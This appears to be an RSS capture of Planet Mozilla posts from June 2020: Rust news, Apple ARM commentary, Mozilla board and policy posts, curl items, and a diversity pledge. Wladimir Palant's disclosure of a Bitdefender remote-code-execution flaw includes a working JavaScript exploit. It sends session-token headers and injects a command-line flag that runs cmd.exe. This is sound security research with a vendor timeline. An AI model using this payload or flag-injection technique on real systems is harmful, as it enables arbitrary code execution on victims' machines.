
Source: http://planet.mozilla.org/.

This journal is generated from the open RSS source at http://planet.mozilla.org/rss20.xml and is updated as that source is updated. It may not match the content of the original page. The feed was created automatically at the request of readers of this RSS feed.


This Week In Rust: This Week in Rust 344 |

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

- Announcing Rust 1.44.1

- Writing Non-Trivial Macros in Rust

- Diving into Rust with a CLI

- Rust for Data-Intensive Computation

- 3K, 60fps, 130ms: achieving it with Rust

- Rust concurrency: the archetype of a message-passing bug.

- How to Design For Panic Resilience in Rust

- GitHub Action for binary crates installation

- Managing Rust bloat with Github Actions

- A multiplayer board game in Rust and WebAssembly

- Im bad at unsafe {}

- SIMD library plans

- Tips for Faster Rust Compile Times

- Rust Analyzer Changelog #30

- Building A Blockchain in Rust & Substrate: A Step-by-Step Guide for Developers

- Dart and Rust: the async story

- Decode a certificate

- Four Years of Rust At OneSignal

- How Rust Lets Us Monitor 30k API calls/min

- How to use C++ polymorphism in Rust

- Implementing a Type-safe printf in Rust

- Introduction to Rust for Node Developers

- The programming language that wants to rescue the world from dangerous code

- Property-based testing in Rust with Proptest

- Rust at CNCF

- Rust's Huge Compilation Units

- RustHorn: CHC-Based Verification for Rust Programs

- Shipping Linux binaries that don't break with Rust

- Some examples of Rust Lifetimes in a struct

- Static PIE and ASLR for the x86_64-unknown-linux-musl Target

- Three bytes to an integer

- Using Rust to Delete Gitignored Cruft

- Tour of Rust - Chapter 8 - Smart Pointers

- Thread-local Storage - Part 13 of Making our own executable packer

- RISC-V OS using Rust - Chapter 11

- Zero To Production #2: Learn By Building An Email Newsletter

- [video] Crust of Rust: Smart Pointers and Interior Mutability

- [video] CS 196 at Illinois

- [video] Ask Me Anything with Felix Klock

- [video] Rust Stream: The Guard Pattern and Interior Mutability

Crate of the Week

This week's crate is diskonaut, a disk usage explorer.

Thanks to Aram Drevekenin for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

325 pull requests were merged in the last week

- add asm!() support for hexagon

- enable LLVM zlib

- add methods to go from a nul-terminated Vec<u8> to a CString

- allow multiple asm! options groups and report an error on duplicate options

- diagnose use of incompatible sanitizers

- disallow loading crates with non-ascii identifier name

- export #[inline] fns with extern indicators

- fix up autoderef when reborrowing

- further tweak lifetime errors involving dyn Trait and impl Trait in return position

- implement crate-level-only lints checking.

- implement new gdb/lldb pretty-printers

- improve diagnostics for let x += 1

- make need_type_info_err more conservative

- make all uses of ty::Error delay a span bug

- make new type param suggestion more targeted

- make novel structural match violations not a bug

- only display other method receiver candidates if they actually apply

- prefer accessible paths in 'use' suggestions

- prevent attacker from manipulating FPU tag word used in SGX enclave

- projection bound validation

- report error when casting a C-like enum implementing Drop

- specialization is unsound

- use min_specialization in the remaining rustc crates

- add specialization of ToString for char

- suggest ?Sized when applicable for ADTs

- support sanitizers on aarch64-unknown-linux-gnu

- test that bounds checks are elided when slice len is checked up-front

- try to suggest dereferences on trait selection failed

- use track caller for bug! macro

- forbid mutable references in all constant contexts except for const-fns

- linker: MSVC supports linking static libraries as a whole archive

- linker: never pass -no-pie to non-gnu linkers

- lint: normalize projections using opaque types

- add a lint to catch clashing extern fn declarations.

- memory access sanity checks: abort instead of panic

- pretty/mir: const value enums with no variants

- store ObligationCause on the heap

- chalk: add closures

- chalk: ignore auto traits order

- fix asinh of negative values

- stabilize Option::zip

- stabilize vec::Drain::as_slice

- use Ipv4Addr::from<[u8; 4]> when possible

- core/time: Add Duration methods for zero

- deprecate wrapping_offset_from

- impl PartialEq<Vec<B>> for &[A], &mut [A]

- hashbrown: avoid creating small tables with a capacity of 1

- stdarch: add AVX 512f gather, scatter and compare intrinsics

- cargo: adding environment variable CARGO_PKG_LICENSE

- cargo: cut down on data fetch from git dependencies

- cargo: fix doctests not running with --target

- cargo: fix order-dependent feature resolution.

- cargo: fix overzealous clean -p for reserved names

- cargo: support linker with -Zdoctest-xcompile.

- rustfmt: avoid using Symbol::intern

- rustfmt: ensure idempotency on empty match blocks

Rust Compiler Performance Triage

- 2020-06-23. Lots of improvements this week, and no regressions, which is good. But we regularly see significant performance effects on rollups, which is a concern.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

- [disposition: merge] impl From<char> for String

- [disposition: merge] stabilize leading_trailing_ones

- [disposition: merge] Add TryFrom<{int}> for NonZero{int}

- [disposition: merge] Stabilize #[track_caller]

- [disposition: merge] add Windows system error codes that should map to io::ErrorKind::TimedOut

- [disposition: merge] Tracking issue for RFC 2344, "Allow loop in constant evaluation"

- [disposition: merge] Tracking issue for Option::deref, Result::deref, Result::deref_ok, and Result::deref_err

New RFCs

Upcoming Events

Online

- June 24. Wroclaw, PL - Remote - Rust Wroclaw Meetup #22

- June 25. Edinburgh, UK - Remote - Pirrigator - Growing Tomatoes Free From Memory Errors and Race Conditions

- June 25. Berlin, DE - Remote - Rust Hack and Learn

- July 1. Johannesburg, ZA - Remote - Monthly Joburg Rust Chat!

North America

- June 30. Dallas, TX, US - Dallas Rust - Last Tuesday

- July 1. Indianapolis, IN, US - Indy Rust - Indy.rs

Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust's beauty lies in the countless decisions made by the development community that constantly make you feel like you can have ten cakes and eat all of them too.

– Jake McGinty et al on the tonari blog

Thanks to llogiq for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

https://this-week-in-rust.org/blog/2020/06/23/this-week-in-rust-344/

|

|

Cameron Kaiser: macOS Big Unsure |

But there's no doubt that Apple's upcoming move to ARM across all its platforms, or at least Apple's version of ARM (let's call it AARM), makes supreme business sense. And ARM being the most common RISC-descended architecture on the planet right now, it's a bittersweet moment for us Power Mac luddites (the other white meat) to see the Reality Distortion Field reject, embrace and then reject x86 once again.

Will AARM benefit Apple? You bet it will. Apple still lives in the shadow of Steve Jobs who always wanted the Mac to be an appliance, and now that Apple controls almost all of the hardware down to the silicon, there's no reason they won't do so. There's certainly benefit to the consumer: Big Sur is going to run really well on AARM because Apple can do whatever hardware tweaks, add whatever special instructions, you name it, to make the one OS the new AARM systems will run as fast and energy-efficient as possible (ironically done with talent from P. A. Semi, who was a Power ISA licensee before Apple bought them out). In fact, it may be the only OS they'll be allowed to run, because you can bet the T2 chip will be doing more and more essential tasks as application-specific hardware adds new functionality where Moore's law has failed. But the biggest win is for Apple themselves, who are no longer hobbled by Intel or IBM's respective roadmaps, and because their hardware will be sui generis will confound any of the attempts at direct (dare I say apples to apples) performance comparisons that doomed them in the past. AARM Macs will be the best machines in their class because nothing else will be in their class.

There's the darker side, too. With things like Gatekeeper, notarization and System Integrity Protection Apple has made it clear they don't want you screwing around with their computers. But the emergence of AARM platforms means Apple doesn't have to keep having the OS itself slap your hand: now the development tools and hardware can do it as well. The possibilities for low-level enforcement of system "security" policies are pretty much limitless if you even control the design of the CPU.

I might actually pick up a low-end one to play with, since I'm sort of a man without a portable platform now that my daily driver is a POWER9 (I have a MacBook Air which I tolerate because battery life, but Mojave Forever, and I'll bet runtime on these machines will be stupendous). However, the part that's the hardest to digest is that the AARM Mac, its hardware philosophy being completely unlike its immediate predecessors, is likely to be more Mac-like than any Mac that came before it save the Compact Macs. After all, remember that Jobs always wanted the Mac to be an appliance. Now, Tim Cook's going to sell you one.

http://tenfourfox.blogspot.com/2020/06/macos-big-unsure.html

|

|

The Mozilla Blog: Navrina Singh Joins the Mozilla Foundation Board of Directors |

Today, I’m excited to welcome Navrina Singh as a new member of the Mozilla Foundation Board of Directors. You can see comments from Navrina here.

Navrina is the Co-Founder of Credo AI, an AI Fund company focused on auditing and governing Machine Learning. She is the former Director of Product Development for Artificial Intelligence at Microsoft. Throughout her career she has focused on many aspects of business including start up ecosystems, diversity and inclusion, development of frontier technologies and products. This breadth of experience is part of the reason she’ll make a great addition to our board.

In early 2020, we began focusing in earnest on expanding Mozilla Foundation’s board. Our recruiting efforts have been geared towards building a diverse group of people who embody the values and mission that bring Mozilla to life and who have the programmatic expertise to help Mozilla, particularly in artificial intelligence.

Since January, we’ve received over 100 recommendations and self-nominations for possible board members. We ran all of the names we received through a desk review process to come up with a shortlist. After extensive conversations, it is clear that Navrina brings the experience, expertise and approach that we seek for the Mozilla Foundation Board.

Prior to working on AI at Microsoft, Navrina spent 12 years at Qualcomm where she held roles across engineering, strategy and product management. In her last role as the head of Qualcomm’s technology incubator ‘ImpaQt’ she worked with early start-ups in machine intelligence. Navrina is a Young Global Leader with the World Economic Forum and has previously served on the industry advisory board of the University of Wisconsin-Madison College of Engineering and on the boards of Stella Labs, Alliance for Empowerment and the Technology Council for FIRST Robotics.

Navrina has been named one of Business Insider’s Top Americans changing the world, and her work in Responsible AI has been featured in FORTUNE, GeekWire and other publications. For the past decade she has been thinking critically about the way AI and other emerging technologies impact society. This included a non-profit initiative called Marketplace for Ethical and Responsible AI Tools (MERAT) focused on building, testing and deploying AI responsibly. It was through this last bit of work that Navrina was introduced to our work at Mozilla. This experience will help inform Mozilla’s own work in trustworthy AI.

We also emphasized throughout this search a desire for more global representation. And while Navrina is currently based in the US, she has a depth of experience partnering with and building relationships across important markets – including China, India and Japan. I have no doubt that this experience will be an asset to the board. Navrina believes that technology can open doors, offering huge value to education, economies and communities in both the developed and developing worlds.

Please join me in welcoming Navrina Singh to the Mozilla Foundation Board of Directors.

PS. You can read Navrina’s message about why she’s joining Mozilla here.

Background:

Twitter: @navrina_singh

LinkedIn: https://www.linkedin.com/in/navrina/

The post Navrina Singh Joins the Mozilla Foundation Board of Directors appeared first on The Mozilla Blog.

|

|

The Mozilla Blog: Why I’m Joining the Mozilla Board |

Firefox was my window into Mozilla 15 years ago, and it’s through this window I saw the power of an open and collaborative community driving lasting change. My admiration and excitement for Mozilla was further bolstered in 2018, when Mozilla made key additions to its Manifesto to be more explicit around its mission to guard the open nature of the internet. For me this addendum signalled an actionable commitment to promote equal access to the internet for ALL, irrespective of demographic characteristics. Growing up in a resource-constrained India in the nineties with limited access to global opportunities, this precise mission truly resonated with me.

Technology should always be in service of humanity – an ethos that has guided my life as a technologist, as a citizen and as a first time co-founder of Credo.ai. Over the years, I have seen the deepened connection between my values and Mozilla’s commitment. I had come to Mozilla as a user for the secure, fast and open product, but I stayed because of this alignment of missions. And today, I’m very honored to join Mozilla’s Board.

Growing up in India, having worked globally and lived in the United States for the past two decades, I have witnessed first-hand the power of informed communities and transparent technologies to drive innovation and change. It is my belief that true societal transformation happens when we empower our people, give them the right tools and the agency to create. Since its infancy Mozilla has enabled exactly that, by creating an open internet to serve people first, where individuals can shape their own empowered experiences.

Though I am excited about all the areas of Mozilla’s impact, I joined the Mozilla board to strategically support the leaders in Mozilla’s next frontier – supporting its theory of change for pursuing more trustworthy Artificial Intelligence.

Mozilla has, from the beginning, rejected the idea of the black box by creating a transparent and open ecosystem, making visible all the inner workings and decision making within its organizations and products. I am beyond excited to see that this is the same mindset (of transparency and accountability) the Mozilla leaders are bringing to their initiatives in trustworthy Artificial Intelligence (AI).

AI is a defining technology of our times which will have a broad impact on every aspect of our lives. Mozilla is committed to mobilizing public awareness and demand for more responsible AI technology especially in consumer products. In my new role as a Mozilla Foundation Board Member, I am honored to support Mozilla’s AI mission, its partners and allies around the world to build momentum for a responsible and trustworthy digital world.

Today the world crumbles under the weight of multiple pandemics – racism, misinformation, coronavirus – powered and resolved by people and technology. Now more than ever the internet and technology need to bring equal opportunity, verifiable facts, human dignity, individual expression and collaboration among diverse communities to serve humanity. Mozilla has championed these tenets and brought about change for decades. Now with its frontier focus on trustworthy AI, I am excited to see the continued impact it brings to our world.

We are at a transformational intersection in our lives where we need to critically examine and explore our choices around technology to serve our communities. How can we build technology that is demonstrably worthy of trust? How can we empower people to design systems for transparency and accountability? How can we check the values and biases we are bringing to building this fabric of frontier technology? How can we build diverse communities to catalyze change? How might we build something better, a better world through responsible technology? These questions have shaped my journey. I hope to bring this learning mindset and informed action in service of the Mozilla board and its trustworthy AI mission.

The post Why I’m Joining the Mozilla Board appeared first on The Mozilla Blog.

https://blog.mozilla.org/blog/2020/06/22/why-im-joining-the-mozilla-board/

|

|

Daniel Stenberg: webinar: testing curl for security |

Alternative title: “testing, QA, CI, fuzzing and security in curl”

June 30 2020, at 10:00 AM in Pacific Time (17:00 GMT, 19:00 CEST).

Time: 30-40 minutes

Abstract: curl runs in some ten billion installations in the world, in virtually every connected device on the planet and ported to more operating systems than most. In this presentation, curl’s lead developer Daniel Stenberg talks about how the curl project takes on testing, QA, CI and fuzzing etc, to make sure curl remains a stable and secure component for everyone while still getting new features and getting developed further. With a Q&A session at the end for your questions!

Register here to attend the live event. The video will be made available afterward.

https://daniel.haxx.se/blog/2020/06/22/webinar-testing-curl-for-security/

|

|

Mozilla Open Policy & Advocacy Blog: Mozilla’s response to EU Commission Public Consultation on AI |

In Q4 2020 the EU will propose what’s likely to be the world’s first general AI regulation. While there is still much to be defined, the EU looks set to establish rules and obligations around what it’s proposing to define as ‘high-risk’ AI applications. In advance of that initiative, we’ve filed comments with the European Commission, providing guidance and recommendations on how it should develop the new law. Our filing brings together insights from our work in Open Innovation and Emerging Technologies, as well as the Mozilla Foundation’s work to advance trustworthy AI in Europe.

We are in alignment with the Commission’s objective outlined in its strategy to develop a human-centric approach to AI in the EU. There is promise and the potential for new and cutting edge technologies that we often collectively refer to as “AI” to provide immense benefits and advancements to our societies, for instance through medicine and food production. At the same time, we have seen some harmful uses of AI amplify discrimination and bias, undermine privacy, and violate trust online. Thus the challenge before the EU institutions is to create the space for AI innovation, while remaining cognisant of, and protecting against, the risks.

We have advised that the EC’s approach should be built around four key pillars:

- Accountability: ensuring the regulatory framework will protect against the harms that may arise from certain applications of AI. That will likely involve developing new regulatory tools (such as the ‘risk-based approach’) as well as enhancing the enforcement of existing relevant rules (such as consumer protection laws).

- Scrutiny: ensuring that individuals, researchers, and governments are empowered to understand and evaluate AI applications, and AI-enabled decisions – through for instance algorithmic inspection, auditing, and user-facing transparency.

- Documentation: striving to ensure better awareness of AI deployment (especially in the public sector), and to ensure that applications allow for documentation where necessary – such as human rights impact assessments in the product design phase, or government registries that map public sector AI deployment.

- Contestability: ensuring that individuals and groups who are negatively impacted by specific AI applications have the ability to contest those impacts and seek redress e.g. through collective action.

The Commission’s consultation focuses heavily on issues related to AI accountability. Our submission therefore provides specific recommendations on how the Commission could better realise the principle of accountability in its upcoming work. Building on the consultation questions, we provide further insight on:

- Assessment of applicable legislation: In addition to ensuring the enforcement of the GDPR, we underline the need to take account of existing rights and protections afforded by EU law concerning discrimination, such as the Racial Equality directive and the Employment Equality directive.

- Assessing and mitigating “high risk” applications: We encourage the Commission to further develop (and/or clarify) its risk mitigation strategy, in particular how, by whom, and when risk is being assessed. There are a range of points we have highlighted here, from the importance of context and use being critical components of risk assessment, to the need for comprehensive safeguards, the importance of diversity in the risk assessment process, and that “risk” should not be the only tool in the mitigation toolbox (e.g. consider moratoriums).

- Use of biometric data: the collection and use of biometric data comes with significant privacy risks and should be carefully considered where possible in an open, consultative, and evidence-based process. Any AI applications harnessing biometric data should conform to existing legal standards governing the collection and processing of biometric data in the GDPR. Besides questions of enforcement and risk-mitigation, we also encourage the Commission to explore edge-cases around biometric data that are likely to come to prominence in the AI sphere, such as voice recognition.

A special thanks goes to the Mozilla Fellows 2020 cohort, who contributed to the development of our submission, in particular Frederike Kaltheuner, Fieke Jansen, Harriet Kingaby, Karolina Iwanska, Daniel Leufer, Richard Whitt, Petra Molnar, and Julia Reinhardt.

This public consultation is one of the first steps in the Commission’s lawmaking process. Consultations in various forms will continue through the end of the year when the draft legislation is planned to be proposed. We’ll continue to build out our thinking on these recommendations, and look forward to collaborating further with the EU institutions and key partners to develop a strong framework for the development of a trusted AI ecosystem. You can find our full submission here.

The post Mozilla’s response to EU Commission Public Consultation on AI appeared first on Open Policy & Advocacy.

|

|

Wladimir Palant: Exploiting Bitdefender Antivirus: RCE from any website |

My tour through vulnerabilities in antivirus applications continues with Bitdefender. One thing shouldn’t go unmentioned: security-wise Bitdefender Antivirus is one of the best antivirus products I’ve seen so far, at least in the areas that I looked at. The browser extensions minimize attack surface, the crypto is sane and the Safepay web browser is only suggested for online banking where its use really makes sense. Also very unusual: despite jQuery being used occasionally, the developers are aware of Cross-Site Scripting vulnerabilities and I only found one non-exploitable issue. And did I mention that reporting a vulnerability to them was a straightforward process, with immediate feedback and without any terms to be signed up front? So clearly security isn’t an afterthought which is sadly different for way too many competing products.

But they aren’t perfect of course, or I wouldn’t be writing this post. I found a combination of seemingly small weaknesses, each of them already familiar from other antivirus products. When used together, the effect was devastating: any website could execute arbitrary code on the user’s system, with the privileges of the current user (CVE-2020-8102). Without any user interaction whatsoever. From any browser, regardless of what browser extensions were installed.


Summary of the findings



As part of its Online Protection functionality, Bitdefender Antivirus will inspect secure HTTPS connections. Rather than leaving error handling to the browser, Bitdefender for some reason prefers to display their own error pages. This is similar to how Kaspersky used to do it but without most of the adverse effects. The consequence is nevertheless that websites can read out some security tokens from these error pages.

These security tokens cannot be used to override errors on other websites, but they can be used to start a session with the Chromium-based Safepay browser. This API was never meant to accept untrusted data, so it is affected by the same vulnerability that we’ve seen in Avast Secure Browser before: command line flags can be injected, which in the worst case results in arbitrary applications starting up.

How Bitdefender deals with HTTPS connections

It seems that these days every antivirus product is expected to come with three features as part of their “online protection” component: Safe Browsing (blocking of malicious websites), Safe Search (flagging of malicious search results) and Safe Banking (delegating online banking websites to a separate browser). Ignoring the question of whether these features are actually helpful, they present antivirus vendors with a challenge: how does one get into encrypted HTTPS connections to implement these?

Some vendors went with the “ask nicely” approach: they ask users to install their browser extension which can then implement the necessary functionality. Think McAfee for example. Others took the “brutal” approach: they got between the browser and the web servers, decrypted the data on their end and re-encrypted it again for the browser using their own signing certificate. Think Kaspersky. And yet others took the “cooperative” approach: they work with the browsers, using an API that allows external applications to see the data without decrypting it themselves. Browsers introduced this API specifically because antivirus products would make such a mess otherwise.

Bitdefender is one of the vendors who chose “cooperative,” for the most part at least. Occasionally their product will have to modify the server response, for example on search pages where they inject the script implementing the Safe Search functionality. Here they unavoidably have to encrypt the modified server response with their own certificate.

Quite surprisingly however, Bitdefender will also handle certificate errors itself instead of leaving them to the browser, despite it being unnecessary with this setup.

Compared to Kaspersky’s, this page does quite a few things right. For example, the highlighted action is “Take me back to safety.” Clicking “I understand the risks” will present an additional warning message which is both informative and largely mitigates clickjacking attacks. But there is also the issue with HSTS being ignored, same as it was with Kaspersky. So altogether this introduces unnecessary risks when the browser is more capable of dealing with errors like this one.

But right now the interesting aspect here is: the URL in the browser’s address bar doesn’t change. So as far as the browser is concerned, this error page originated at the web server and there is no reason why other web pages from the same server shouldn’t be able to access it. Whatever security tokens are contained within it, websites can read them out – an issue we’ve seen in Kaspersky products before.

What accessing an error page can be good for

My proof of concept used a web server that presented a valid certificate on the initial request but switched to an invalid certificate after that. This allowed loading a malicious page in the browser, then switching to an invalid certificate and using XMLHttpRequest to download the resulting error page. This being a same-origin request, the browser will not stop you. In that page you would have the code behind the “I understand the risks” link:

var params = encodeURIComponent(window.location);

sid = "" + Math.random();

obj_ajax.open("POST", sid, true);

obj_ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

obj_ajax.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", "NDSECK_c8f32fef47aca4f2586bd075f74d2aa4");

obj_ajax.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", "NDCA_c8f32fef47aca4f2586bd075f74d2aa4");

obj_ajax.setRequestHeader("BDNDTK_BTS86RE4PDHKKZYVUJE2UCM87SLSUGYF", "835f2e23ded6bda7b3476d0db093e2f590efc1e9333f7bb7ad48f0dba1f548d2");

obj_ajax.setRequestHeader("BDWL_D0D57627257747A3B2EE8E4C3B86CBA3", "a99d4961b70a8179664efc718b00c8a8");

obj_ajax.setRequestHeader("BDPID_A381AA0A15254C36A72B115329559BEB", "1234");

obj_ajax.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "cl.proceedanyway");

obj_ajax.send(params);

So in order to communicate with the Bitdefender application, a website sends a request to any address. The request will then be processed by Bitdefender locally if the correct HTTP headers are set. And despite the header names looking randomized, they are actually hardcoded and never change. So what we are interested in are the values.

The most interesting headers are BDNDSS_B67EA559F21B487F861FDA8A44F01C50 and BDNDCA_BBACF84D61A04F9AA66019A14B035478. These contain essentially the same value, an identifier of the current Bitdefender session. Would we be able to ignore errors on other websites using these? No, this doesn’t work because the correct BDNDTK_BTS86RE4PDHKKZYVUJE2UCM87SLSUGYF value is required as well. It’s an HMAC-SHA-256 signature of the page address, and the session-specific secret used to generate this signature isn’t exposed.
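To make the role of that signature concrete, here is a minimal Node.js sketch of signing a page address with HMAC-SHA-256. It is only an illustration of the general technique: the secret, the example addresses and the function names signAddress and verifyToken are all hypothetical, and nothing here is taken from Bitdefender's actual implementation.

```javascript
// Sketch only: the secret, addresses and function names are hypothetical,
// not taken from Bitdefender's implementation.
const crypto = require("crypto");

// A per-session secret that never leaves the local application.
const sessionSecret = crypto.randomBytes(32);

// Sign a page address with HMAC-SHA-256 and return the hex digest.
function signAddress(secret, address) {
  return crypto.createHmac("sha256", secret).update(address, "utf8").digest("hex");
}

// Compare a presented token against the expected signature in constant time.
function verifyToken(secret, address, token) {
  const expected = Buffer.from(signAddress(secret, address), "hex");
  const given = Buffer.from(token, "hex");
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

const token = signAddress(sessionSecret, "https://a.example/");
console.log(verifyToken(sessionSecret, "https://a.example/", token)); // true
console.log(verifyToken(sessionSecret, "https://b.example/", token)); // false
```

A token read out of one site's error page is bound to that site's address, so replaying it for a different address fails verification unless the secret is known.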

But remember, there are three online protection components, and the other ones also expose some functionality to the web. As it turns out, all functionality uses the same BDNDSS_B67EA559F21B487F861FDA8A44F01C50 and BDNDCA_BBACF84D61A04F9AA66019A14B035478 values, but Safe Search and Safe Banking don’t implement any additional protection beyond that. Want to have the antivirus check a bunch of search results for you? Probably not very exciting but any website could access that functionality.

Starting and exploiting banking mode

But starting banking mode is more interesting. The following code template from Bitdefender shows how. This template is meant to generate code injected into banking websites, but it doesn’t appear to be used any more (yes, unused code can still cause issues).

var params = encodeURIComponent(window.location);

sid = "" + Math.random();

obj_ajax.open("POST", sid, true);

obj_ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

obj_ajax.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", "{%NDSECK%}");

obj_ajax.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", "{%NDCA%}");

obj_ajax.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "{%OBKCMD%}");

obj_ajax.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", "{%OBKREFERRER%}");

obj_ajax.send(params);

We’ve seen the NDSECK and NDCA values before: they are the values that can be extracted from Bitdefender’s error page. OBKCMD can be obk.ask or obk.run depending on whether we want to ask the user first or run the Safepay browser immediately (we want the latter of course). OBKREFERRER can be any address and doesn’t seem to matter. But the params value sent with the request is important: it will be the address opened in the Safepay browser.



So now we have a way to open a malicious website in the Safepay browser, and we can potentially compromise all the nicely isolated online banking websites running there. But that’s not the big coup of course. What if we try to open a javascript: address? Well, it crashes, could be exploitable… And what about whitespace in the address? Spaces will be URL-encoded in https: addresses but not in data: addresses. And then we see the same issue as with Avast’s banking mode, whitespace allows injecting command line flags.

That’s it, time for the actual exploit. Here, param1 and param2 are the values extracted from the error page:

var request = new XMLHttpRequest();

request.open("POST", Math.random());

request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);

request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);

request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");

request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);

request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");

And this is what you get then:

The first line is the output of the whoami command while the remaining output is produced by the echo command – it displays all the additional command line parameters received by the application.

Conclusions

It’s generally preferable that antivirus vendors stay away from encrypted connections as much as possible. Messing with server responses tends to cause issues even when executed carefully, which is why I consider browser extensions the preferable way of implementing online protection. But even with their current approach, Bitdefender should really leave error handling to the browser.

There is also the casual reminder here that even data considered safe should not be trusted unconditionally. That’s particularly the case when constructing command lines: properly escaping parameter values should be the default, so that unintentionally injecting command line flags, for example, is impossible. And of course: if you don’t use some code, remove it! Less code automatically means fewer potential vulnerabilities.
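The command line point can be illustrated with a small sketch. Everything here is an assumption made for illustration: `browser.exe`, the simplified `splitCommandLine` tokenizer and both builder functions are hypothetical and do not reflect how Safepay actually launches its browser. The sketch only shows why pasting an address into a command line string is risky and how validating it first closes that gap.

```javascript
// Simplified stand-in for how a program might split a command line string:
// whitespace separates arguments, double quotes group them.
function splitCommandLine(commandLine) {
  const pattern = /(?:[^\s"]+|"[^"]*")+/g;
  return (commandLine.match(pattern) || []).map((token) =>
    token.replace(/"/g, "")
  );
}

// Unsafe: the address is pasted into the command line unchanged.
function buildUnsafe(address) {
  return `browser.exe ${address}`;
}

// Safer: parse the address, allow only http(s), and return an argument list.
function buildChecked(address) {
  const url = new URL(address); // throws on unparsable input
  if (url.protocol !== "https:" && url.protocol !== "http:") {
    throw new Error(`unsupported scheme: ${url.protocol}`);
  }
  // In the serialized form, spaces and quotes are percent-encoded for http(s).
  return ["browser.exe", url.href];
}

const payload =
  'data:text/html,nada --utility-cmd-prefix="cmd.exe /k whoami & echo"';

const tokens = splitCommandLine(buildUnsafe(payload));
console.log(tokens.length); // 3: the address was split and a flag was injected
console.log(tokens[2]); // --utility-cmd-prefix=cmd.exe /k whoami & echo

console.log(buildChecked("https://example.com/a b")[1]); // https://example.com/a%20b
```

An argument list like the one returned by `buildChecked` can be handed to an API that takes arguments separately, such as Node's `child_process.execFile`, rather than being joined back into a single string.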

Timeline

- 2020-04-15: Reported the vulnerability via the Bitdefender Bug Bounty Program.

- 2020-04-15: Confirmation from Bitdefender that the report was received.

- 2020-04-16: Confirmation that the issue could be reproduced, CVE number assigned.

- 2020-04-23: Notification that the vulnerability is resolved and updates are underway.

- 2020-05-04: Communication about bug bounty payout (declined by me) and coordinated disclosure.

- 2020-05-12: Confirmation that fixes have been pushed out. Disclosure delayed due to waiting for technology partners.

https://palant.info/2020/06/22/exploiting-bitdefender-antivirus-rce-from-any-website/

|

|

Daniel Stenberg: curl user survey 2020 analysis |



In 2020, the curl user survey ran for the 7th consecutive year. It ended on May 31 and this year we managed to get feedback donated by 930 individuals.

Analysis

Analyzing this huge lump of data, comments and shared experiences is a lot of work and I’m sorry it’s taken me several weeks to complete it. I’m happy to share this 47 page PDF document here with you:

curl user survey 2020 analysis

If you have questions on the content or find mistakes or things looking odd in the data or graphs, do let me know!

If you want to help out to do a better survey or analysis next year, I hope you know that you’d be much appreciated…

https://daniel.haxx.se/blog/2020/06/21/curl-user-survey-2020-analysis/

|

|

Cameron Kaiser: TenFourFox FPR24b1 available |

http://tenfourfox.blogspot.com/2020/06/tenfourfox-fpr24b1-available.html

|

|

The Mozilla Blog: First Steps Toward Lasting Change |

In this moment of rapid change, we recognize that the relics of racism exist. The actions we have seen most recently are not isolated actions. Racial injustice affects all aspects of life in our society, our collective progress has been insufficient, Mozilla’s progress has been insufficient. As we said earlier this month, we have work to do.

Today, we are sharing a set of commitments that are a starting point for three areas where we will drive change across Mozilla:

1. Who we are: Our employee base and our communities

To begin, we are committed to significantly increasing Black and Latinx representation in Mozilla in the next two years. We will:

- Double the percentage of Black and Latinx representation of our U.S. staff. This is a starting point for what Mozilla should look like, not an aspirational end point, and it applies to all levels of the organization.

- Increase Black representation in the U.S. at the leadership level, aiming for 6% Black employees at the Director level and up, as well as representation on Mozilla Corporation and Mozilla Foundation boards.

- Create dedicated and comprehensive recruiting, development and inclusion efforts that attract and retain Black and Latinx Mozillans.

These commitments are not just about numbers, but about people, and that means having an environment that is diverse, inclusive and welcoming and addresses issues in people’s lives. Our work ahead is in hiring and retaining and also in providing the resources to mentor, develop and advance diverse employees, as well as ongoing education and reflection for our full staff, so that we can create the environment that reflects our mission and our users.

2. What we build: Our outreach with our products

Educating ourselves is how we can begin dismantling systemic racism, and to do that we started with surfacing content via Pocket through Firefox. These collections of works by Black writers and thought leaders are being distributed through our Pocket product with companion promotion through Firefox product messaging. It was new for us to use our products in this way. We will continue to explore how we can leverage the functionality and reach of our products and services to advance change.

Our user research and understanding of our users, their stories and problems also need broadening. We see this as a journey, with undoubtedly other ways that our products can contribute more.

3. What we do beyond products: Our broader engagement with the world

